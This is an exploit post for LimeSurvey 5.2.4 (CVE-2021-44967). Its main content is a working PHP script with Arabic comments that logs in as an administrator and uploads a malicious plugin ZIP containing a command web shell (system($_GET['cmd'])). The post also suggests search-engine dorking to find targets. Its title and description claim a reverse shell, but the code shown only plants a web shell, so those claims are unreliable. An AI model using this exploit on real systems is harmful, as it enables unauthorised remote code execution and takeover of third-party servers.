=============================================================================================================================================
| # Title     : LimeSurvey 5.2.4 reverse shell Vulnerability                                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://www.limesurvey.org/                                                                                                 |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This script is used to exploit vulnerability in LimeSurvey to load a malicious PHP plugin and execute a reverse shell.

   (Related : https://packetstorm.news/files/id/189288/ Related CVE numbers: 	CVE-2021-44967 ) .
	
[+] save code as poc.php.

[+] Set TArget : line 112

[+] Usage : php poc.php

[+] PayLoad :

<?php

/**
 * هذا السكريبت يُستخدم لاستغلال ثغرة CVE-2021-44967 في LimeSurvey لتحميل ملحق PHP خبيث وتنفيذ عكسية Shell.
 */

// تعطيل تحذيرات SSL
$context = stream_context_create([
    'ssl' => [
        'verify_peer' => false,
        'verify_peer_name' => false,
    ]
]);

// إعدادات الملحق الخبيث
$plugin_name = "ExploitRCE_" . rand(1000, 9999);
$date = date("Y-m-d");
$xml_config = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
$xml_config .= "<config>\n";
$xml_config .= "    <metadata>\n";
$xml_config .= "        <name>$plugin_name</name>\n";
$xml_config .= "        <type>plugin</type>\n";
$xml_config .= "        <creationDate>$date</creationDate>\n";
$xml_config .= "        <lastUpdate>$date</lastUpdate>\n";
$xml_config .= "        <version>1.0</version>\n";
$xml_config .= "    </metadata>\n";
$xml_config .= "    <compatibility>\n";
$xml_config .= "        <version>3.0</version>\n";
$xml_config .= "        <version>4.0</version>\n";
$xml_config .= "        <version>5.0</version>\n";
$xml_config .= "        <version>6.0</version>\n";
$xml_config .= "        <version>7.0</version>\n";
$xml_config .= "    </compatibility>\n";
$xml_config .= "</config>";

// دالة تسجيل الدخول إلى LimeSurvey
function limesurvey_authenticate($url, $username, $password) {
    echo "[*] محاولة تسجيل الدخول...\n";
    $login_url = "$url/index.php/admin/authentication/sa/login";
    $login_page = file_get_contents($login_url, false, $GLOBALS['context']);
    preg_match('/name=\"YII_CSRF_TOKEN\" value=\"(.*?)\"/', $login_page, $matches);
    $csrf_token = $matches[1] ?? '';
    
    $data = http_build_query([
        "YII_CSRF_TOKEN" => $csrf_token,
        "authMethod" => "Authdb",
        "user" => $username,
        "password" => $password,
        "login_submit" => "login"
    ]);

    $options = [
        "http" => [
            "method" => "POST",
            "header" => "Content-type: application/x-www-form-urlencoded",
            "content" => $data,
        ]
    ];
    
    $result = file_get_contents($login_url, false, stream_context_create($options));
    
    if (strpos($result, '/index.php/admin/index') !== false) {
        echo "[+] تسجيل الدخول ناجح!\n";
    } else {
        echo "[-] فشل تسجيل الدخول\n";
        exit();
    }
}

// رفع وتنفيذ الحمولة الخبيثة
function upload_payload($url, $plugin_name, $payload) {
    echo "[*] رفع الحمولة الخبيثة...\n";
    $upload_url = "$url/index.php/admin/pluginmanager?sa=upload";
    
    $boundary = "----WebKitFormBoundary" . md5(time());
    $data = "--$boundary\r\n";
    $data .= "Content-Disposition: form-data; name=\"the_file\"; filename=\"$plugin_name.zip\"\r\n";
    $data .= "Content-Type: application/zip\r\n\r\n";
    $data .= $payload . "\r\n";
    $data .= "--$boundary--\r\n";
    
    $options = [
        "http" => [
            "method" => "POST",
            "header" => "Content-Type: multipart/form-data; boundary=$boundary",
            "content" => $data,
        ]
    ];
    
    $result = file_get_contents($upload_url, false, stream_context_create($options));
    
    if (strpos($result, 'sa=uploadConfirm') !== false) {
        echo "[+] رفع الحمولة ناجح!\n";
    } else {
        echo "[-] فشل في رفع الحمولة\n";
        exit();
    }
}

// إعداد الحمولة الخبيثة
$payload = "<?php system(\$_GET['cmd']); ?>";
$zip = new ZipArchive();
$zip_file = tempnam(sys_get_temp_dir(), "exploit") . ".zip";
$zip->open($zip_file, ZipArchive::CREATE);
$zip->addFromString("config.xml", $xml_config);
$zip->addFromString("payload.php", $payload);
$zip->close();
$payload_data = file_get_contents($zip_file);
unlink($zip_file);

// تنفيذ الاستغلال
$url = "http://target-limesurvey.com"; // استبدل بعنوان الهدف
$username = "admin";
$password = "password";

limesurvey_authenticate($url, $username, $password);
upload_payload($url, $plugin_name, $payload_data);

echo "[*] تم تنفيذ الاستغلال بنجاح!\n";




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================